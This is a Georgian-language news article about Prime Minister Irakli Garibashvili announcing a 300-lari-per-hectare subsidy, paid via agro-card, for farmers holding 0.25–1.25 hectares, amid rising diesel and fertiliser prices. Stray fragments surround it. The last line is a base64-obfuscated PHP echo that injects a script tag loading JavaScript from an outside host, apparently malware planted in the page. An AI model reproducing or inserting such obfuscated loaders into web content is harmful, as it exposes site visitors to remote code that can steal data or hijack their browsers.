celsiusi
ავერსი შნაიდერი
საქართველოს პრემიერ-მინისტრის, ირაკლი ღარიბაშვილის განცხადებით, მცირემიწიანი ფერმერები სასოფლო-სამეურნეო საქმიანობისთვის სუბსიდიას მიიღებენ.
 
მან ამის შესახებ, 18 მარტს, მთავრობის სხდომაზე განაცხადა.
 
ირაკლი ღარიბაშვილის განცხადებით, სუბსიდიის ოდენობა განისაზღვრება ერთ ჰექტარზე 300 ლარით.
 
სუბსიდიის მიღებას შეძლებენ ის ფერმერები, რომლებიც 0.25-დან 1.25 ჰექტრამდე სასოფლო-სამეურნეო ტიპის მიწის ფართობს ფლობენ.
 
ფერმერები შეძლებენ, სუბსიდია აგრობარათის სახით მიიღონ და სასოფლო სამეურნეო პროდუქციის შეძენისთვის გამოიყენონ.
 
პროგრამის ბიუჯეტი 35 მილიონ ლარს შეადგენს.
 
ირაკლი ღარიბაშვილის განცხადებით, ეს დადებით გავლენას მოახდენს წარმოებული პროდუქციის თვითღირებულების შემცირებაზე.
 
საქართველოში ბოლო ერთი თვის განმავლობაში განსაკუთრებით გაძვირდა დიზელის საწვავი, რომელიც სასოფლო-სამეურნეო საქმიანობისთვის გამოიყენება.
 
ასევე გაძვირებულია პროდუქციის მოყვანისთვის საჭირო პრეპარატები და სასუქები.
 
გასულ კვირას ნეტგაზეთს სოფლის მეურნეობის სამინისტროში განუცხადეს, რომ წელს საწვავზე სუბსიდირება არ იქნებოდა.
 
ნეტგაზეთი ცდილობს გაარკვიოს მოიცავს თუ არა პრემიერ-მინისტრის მიერ დაანონსებული სუბსიდირების პროგრამა საწვავსა და სასუქებს.
861
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");